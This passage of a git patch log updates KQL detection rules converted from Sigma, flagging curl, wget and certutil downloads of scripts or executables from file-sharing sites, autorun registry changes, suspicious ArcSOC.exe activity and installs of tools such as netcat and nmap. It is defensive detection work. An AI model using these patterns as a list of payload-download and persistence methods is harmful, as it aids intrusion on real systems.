"gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "pixeldrain.com" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") \ No newline at end of file +| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "github.com" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "pixeldrain.com" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql index 38705676..74c057a6 100644 --- a/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql +++ b/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql @@ -7,4 +7,4 @@ // Tags: attack.execution DeviceProcessEvents -| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "pixeldrain.com" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") \ No newline at end of file +| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "github.com" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "pixeldrain.com" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql index efe3691e..37babf2c 100644 --- a/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql +++ b/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql @@ -7,4 +7,4 @@ // Tags: attack.defense-evasion, attack.t1027, attack.command-and-control, attack.t1105 DeviceProcessEvents -| where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl " or ProcessCommandLine contains "URL ") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file +| where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl " or ProcessCommandLine contains "URL ") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "github.com" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/wow6432node_currentversion_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/wow6432node_currentversion_autorun_keys_modification.kql index da42fd2d..fc54df88 100644 --- a/KQL/rules/windows/registry/registry_set/wow6432node_currentversion_autorun_keys_modification.kql +++ b/KQL/rules/windows/registry/registry_set/wow6432node_currentversion_autorun_keys_modification.kql @@ -10,4 +10,4 @@ // - Legitimate administrator sets up autorun keys for legitimate reason DeviceRegistryEvents -| where (RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion" and (RegistryKey contains "\\ShellServiceObjectDelayLoad" or RegistryKey endswith "\\Run*" or RegistryKey endswith "\\RunOnce*" or RegistryKey endswith "\\RunOnceEx*" or RegistryKey endswith "\\RunServices*" or RegistryKey endswith "\\RunServicesOnce*" or RegistryKey contains "\\Explorer\\ShellServiceObjects" or RegistryKey contains "\\Explorer\\ShellIconOverlayIdentifiers" or RegistryKey contains "\\Explorer\\ShellExecuteHooks" or RegistryKey contains "\\Explorer\\SharedTaskScheduler" or RegistryKey contains "\\Explorer\\Browser Helper Objects")) and (not(((InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{" and InitiatingProcessFolderPath contains "\\setup.exe") or RegistryValueData =~ "(Empty)" or RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\windowsdesktop-runtime-" or (InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\msiexec.exe" and RegistryKey endswith "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run*") or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "\\Explorer\\Browser Helper Objects") or (RegistryValueData endswith " /burn.runonce" and (InitiatingProcessFolderPath contains "\\winsdksetup.exe" or InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" or InitiatingProcessFolderPath contains "\\AspNetCoreSharedFrameworkBundle-") and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\")) or (RegistryValueData endswith "}\\VC_redist.x64.exe\" /burn.runonce" and InitiatingProcessFolderPath endswith "\\VC_redist.x64.exe")))) and (not(((RegistryValueData endswith "instup.exe\" /instop:repair /wait" and InitiatingProcessFolderPath endswith "\\instup.exe" and RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\AvRepair") or ((RegistryValueData in~ ("{472083B1-C522-11CF-8763-00608CC02F24}", "{472083B0-C522-11CF-8763-00608CC02F24}")) and InitiatingProcessFolderPath endswith "\\instup.exe" and (RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellIconOverlayIdentifiers\\00avg\\(Default)" or RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellIconOverlayIdentifiers\\00asw\\(Default)")) or (RegistryValueData endswith "\\Avira.OE.Setup.Bundle.exe\" /burn.runonce" and InitiatingProcessFolderPath endswith "\\Avira.OE.Setup.Bundle.exe") or (RegistryValueData endswith "Discord.exe --checkInstall" and RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Discord") or (RegistryValueData endswith ".exe\" /burn.runonce" and RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\" and InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" and (RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}" or RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{7037b699-7382-448c-89a7-4765961d2537}")) or (RegistryValueData endswith "-A251-47B7-93E1-CDD82E34AF8B}" or RegistryValueData =~ "grpconv -o" or (RegistryValueData contains "C:\\Program Files" and RegistryValueData contains "\\Dropbox\\Client\\Dropbox.exe" and RegistryValueData contains " /systemstartup")) or RegistryKey endswith "\\Explorer\\Browser Helper Objects\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\NoExplorer" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe" and RegistryKey endswith "\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Wow6432Node*") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")) and RegistryKey endswith "\\Explorer\\Browser Helper Objects\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}*") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\"))))) \ No newline at end of file +| where (RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion" and (RegistryKey contains "\\ShellServiceObjectDelayLoad" or RegistryKey endswith "\\Run*" or RegistryKey endswith "\\RunOnce*" or RegistryKey endswith "\\RunOnceEx*" or RegistryKey endswith "\\RunServices*" or RegistryKey endswith "\\RunServicesOnce*" or RegistryKey contains "\\Explorer\\ShellServiceObjects" or RegistryKey contains "\\Explorer\\ShellIconOverlayIdentifiers" or RegistryKey contains "\\Explorer\\ShellExecuteHooks" or RegistryKey contains "\\Explorer\\SharedTaskScheduler" or RegistryKey contains "\\Explorer\\Browser Helper Objects")) and (not(((InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{" and InitiatingProcessFolderPath contains "\\setup.exe") or RegistryValueData =~ "(Empty)" or RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\windowsdesktop-runtime-" or (InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\msiexec.exe" and RegistryKey endswith "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run*") or isnull(RegistryValueData) or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "\\Explorer\\Browser Helper Objects") or (RegistryValueData endswith " /burn.runonce" and (InitiatingProcessFolderPath contains "\\winsdksetup.exe" or InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" or InitiatingProcessFolderPath contains "\\AspNetCoreSharedFrameworkBundle-") and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\")) or (RegistryValueData endswith "}\\VC_redist.x64.exe\" /burn.runonce" and InitiatingProcessFolderPath endswith "\\VC_redist.x64.exe")))) and (not(((RegistryValueData endswith "instup.exe\" /instop:repair /wait" and InitiatingProcessFolderPath endswith "\\instup.exe" and RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\AvRepair") or ((RegistryValueData in~ ("{472083B1-C522-11CF-8763-00608CC02F24}", "{472083B0-C522-11CF-8763-00608CC02F24}")) and InitiatingProcessFolderPath endswith "\\instup.exe" and (RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellIconOverlayIdentifiers\\00avg\\(Default)" or RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellIconOverlayIdentifiers\\00asw\\(Default)")) or (RegistryValueData endswith "\\Avira.OE.Setup.Bundle.exe\" /burn.runonce" and InitiatingProcessFolderPath endswith "\\Avira.OE.Setup.Bundle.exe") or (RegistryValueData endswith "Discord.exe --checkInstall" and RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Discord") or (RegistryValueData endswith ".exe\" /burn.runonce" and RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\" and InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" and (RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}" or RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{7037b699-7382-448c-89a7-4765961d2537}")) or (RegistryValueData endswith "-A251-47B7-93E1-CDD82E34AF8B}" or RegistryValueData =~ "grpconv -o" or (RegistryValueData contains "C:\\Program Files" and RegistryValueData contains "\\Dropbox\\Client\\Dropbox.exe" and RegistryValueData contains " /systemstartup")) or RegistryKey endswith "\\Explorer\\Browser Helper Objects\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\NoExplorer" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe" and RegistryKey endswith "\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Wow6432Node*") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")) and RegistryKey endswith "\\Explorer\\Browser Helper Objects\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}*") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\"))))) \ No newline at end of file diff --git a/sigma b/sigma index 0490e31e..68519438 160000 --- a/sigma +++ b/sigma @@ -1 +1 @@ -Subproject commit 0490e31eb5b4bfc5e98ef66bbc4870176e4bed9e +Subproject commit 685194383b4d6e594ec264e7d92270108783197d From deef7ae86e038d739e5776c4ccb9d8e3bb90bf17 Mon Sep 17 00:00:00 2001 From: Khadinxc <89855993+Khadinxc@users.noreply.github.com> Date: Sun, 28 Dec 2025 02:45:46 +0000 Subject: [PATCH 15/17] chore: update KQL rules from latest Sigma rules --- .../suspicious_file_created_by_arcsoc_exe.kql | 14 ++++++++++++++ ...eb_request_with_potential_custom_user_agent.kql | 2 +- .../suspicious_arcsoc_exe_child_process.kql | 13 +++++++++++++ sigma | 2 +- 4 files changed, 29 insertions(+), 2 deletions(-) create mode 100644 KQL/rules/windows/file/file_event/suspicious_file_created_by_arcsoc_exe.kql create mode 100644 KQL/rules/windows/process_creation/suspicious_arcsoc_exe_child_process.kql diff --git a/KQL/rules/windows/file/file_event/suspicious_file_created_by_arcsoc_exe.kql b/KQL/rules/windows/file/file_event/suspicious_file_created_by_arcsoc_exe.kql new file mode 100644 index 00000000..bdbf4ebf --- /dev/null +++ b/KQL/rules/windows/file/file_event/suspicious_file_created_by_arcsoc_exe.kql @@ -0,0 +1,14 @@ +// Title: Suspicious File Created by ArcSOC.exe +// Author: Micah Babinski +// Date: 2025-11-25 +// Level: high +// Description: Detects instances where the ArcGIS Server process ArcSOC.exe, which hosts REST services running on an ArcGIS +// server, creates a file with suspicious file type, indicating that it may be an executable, script file, +// or otherwise unusual. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.command-and-control, attack.persistence, attack.initial-access, attack.t1127, attack.t1105, attack.t1133 +// False Positives: +// - Unlikely + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "\\ArcSOC.exe" and (FolderPath endswith ".ahk" or FolderPath endswith ".aspx" or FolderPath endswith ".au3" or FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".js" or FolderPath endswith ".ps1" or FolderPath endswith ".py" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/curl_web_request_with_potential_custom_user_agent.kql b/KQL/rules/windows/process_creation/curl_web_request_with_potential_custom_user_agent.kql index c0669df6..af558ad1 100644 --- a/KQL/rules/windows/process_creation/curl_web_request_with_potential_custom_user_agent.kql +++ b/KQL/rules/windows/process_creation/curl_web_request_with_potential_custom_user_agent.kql @@ -7,4 +7,4 @@ // Tags: attack.execution DeviceProcessEvents -| where (ProcessCommandLine contains "User-Agent:" and ProcessCommandLine matches regex "\\s-H\\s") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") \ No newline at end of file +| where (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and (ProcessCommandLine matches regex "\\s-H\\s" or ProcessCommandLine contains "--header") and ProcessCommandLine contains "User-Agent:" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_arcsoc_exe_child_process.kql b/KQL/rules/windows/process_creation/suspicious_arcsoc_exe_child_process.kql new file mode 100644 index 00000000..5509bc32 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_arcsoc_exe_child_process.kql @@ -0,0 +1,13 @@ +// Title: Suspicious ArcSOC.exe Child Process +// Author: Micah Babinski +// Date: 2025-11-25 +// Level: high +// Description: Detects script interpreters, command-line tools, and similar suspicious child processes of ArcSOC.exe. +// ArcSOC.exe is the process name which hosts ArcGIS Server REST services. If an attacker compromises an ArcGIS +// Server system and uploads a malicious Server Object Extension (SOE), they can send crafted requests to the corresponding +// service endpoint and remotely execute code from the ArcSOC.exe process. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.t1203 + +DeviceProcessEvents +| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\ArcSOC.exe") and (not((ProcessCommandLine =~ "cmd.exe /c \"ver\"" and FolderPath endswith "\\cmd.exe"))) \ No newline at end of file diff --git a/sigma b/sigma index 68519438..c8b1a0ff 160000 --- a/sigma +++ b/sigma @@ -1 +1 @@ -Subproject commit 685194383b4d6e594ec264e7d92270108783197d +Subproject commit c8b1a0ff67b77718d7030278d8e955f621df9b6b From 3b63287c8206631b6a9e83f21b8d7735978675bb Mon Sep 17 00:00:00 2001 From: Khadinxc <89855993+Khadinxc@users.noreply.github.com> Date: Sun, 11 Jan 2026 02:46:50 +0000 Subject: [PATCH 16/17] chore: update KQL rules from latest Sigma rules --- .../process_creation/local_system_accounts_discovery_linux.kql | 2 +- .../process_creation/suspicious_package_installed_linux.kql | 2 +- sigma | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/KQL/rules/linux/process_creation/local_system_accounts_discovery_linux.kql b/KQL/rules/linux/process_creation/local_system_accounts_discovery_linux.kql index 64673cf3..d29fa812 100644 --- a/KQL/rules/linux/process_creation/local_system_accounts_discovery_linux.kql +++ b/KQL/rules/linux/process_creation/local_system_accounts_discovery_linux.kql @@ -2,7 +2,7 @@ // Author: Alejandro Ortuno, oscd.community, CheraghiMilad // Date: 2020-10-08 // Level: low -// Description: Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior. +// Description: Detects enumeration of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior. // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1087.001 // False Positives: diff --git a/KQL/rules/linux/process_creation/suspicious_package_installed_linux.kql b/KQL/rules/linux/process_creation/suspicious_package_installed_linux.kql index fb7f4e3a..48a6fa57 100644 --- a/KQL/rules/linux/process_creation/suspicious_package_installed_linux.kql +++ b/KQL/rules/linux/process_creation/suspicious_package_installed_linux.kql @@ -9,4 +9,4 @@ // - Legitimate administration activities DeviceProcessEvents -| where ((ProcessCommandLine contains "install" and (FolderPath endswith "/apt" or FolderPath endswith "/apt-get")) or ((ProcessCommandLine contains "--install" or ProcessCommandLine contains "-i") and FolderPath endswith "/dpkg") or (ProcessCommandLine contains "-i" and FolderPath endswith "/rpm") or ((ProcessCommandLine contains "localinstall" or ProcessCommandLine contains "install") and FolderPath endswith "/yum")) and (ProcessCommandLine contains "nmap" or ProcessCommandLine contains " nc" or ProcessCommandLine contains "netcat" or ProcessCommandLine contains "wireshark" or ProcessCommandLine contains 